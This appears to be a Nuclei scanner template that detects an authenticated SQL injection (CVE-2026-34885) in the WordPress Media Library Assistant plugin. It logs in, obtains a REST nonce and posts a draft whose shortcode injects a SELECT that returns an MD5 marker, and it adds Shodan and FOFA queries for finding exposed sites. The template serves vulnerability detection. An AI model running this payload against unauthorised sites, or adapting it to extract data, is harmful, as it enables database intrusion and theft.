id: CVE-2026-34885

info:
  name: WordPress Media Library Assistant <= 3.34 - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    David Lingren Media Library Assistant <= 3.34 contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, modification, or deletion.
  remediation: |
    Update to the latest version beyond 3.34.
  reference:
    - https://patchstack.com/database/vulnerability/wordpress-media-library-assistant-plugin-3-34-sql-injection-vulnerability
    - https://plugins.svn.wordpress.org/media-library-assistant/tags/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-34885
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 8.5
    cve-id: CVE-2026-34885
    epss-score: 0.08063
    epss-percentile: 0.92346
    cwe-id: CWE-89
  metadata:
    max-request: 5
    verified: true
    shodan-query: http.html:"/wp-content/plugins/media-library-assistant/"
    fofa-query: body="/wp-content/plugins/media-library-assistant/"
  tags: cve,cve2026,wp,wordpress,wp-plugin,sqli,media-library-assistant,authenticated

variables:
  num: "999999999"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt"

    matchers:
      - type: word
        words:
          - "Media Library Assistant"
          - "Stable tag:"
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=rest-nonce HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 0
        regex:
          - "^[a-f0-9]{10}$"
        internal: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-json/wp/v2/posts HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-WP-Nonce: {{nonce}}

        {"title":"{{rand_text_alpha(10)}}","content":"[mla_custom_list meta_key=\"_wp_attached_file\" fields=\"(SELECT CONCAT(0x7170787871,md5({{num}}),0x7171787171)) AS meta_value\" no_count=\"true\"]","status":"draft"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 201'
          - 'contains_all(body, "{{md5(num)}}", "content", "rendered")'
        condition: and
# digest: 4a0a0047304502210087df305664c626e631320a6e695de8aa00602b15bbd9f872c67abf74ae569ed5022020878fdd0e86466aa02896b27316bc399fbf26175f2e194979763290bc03a52f:922c64590222798bb761d5b6d8e72950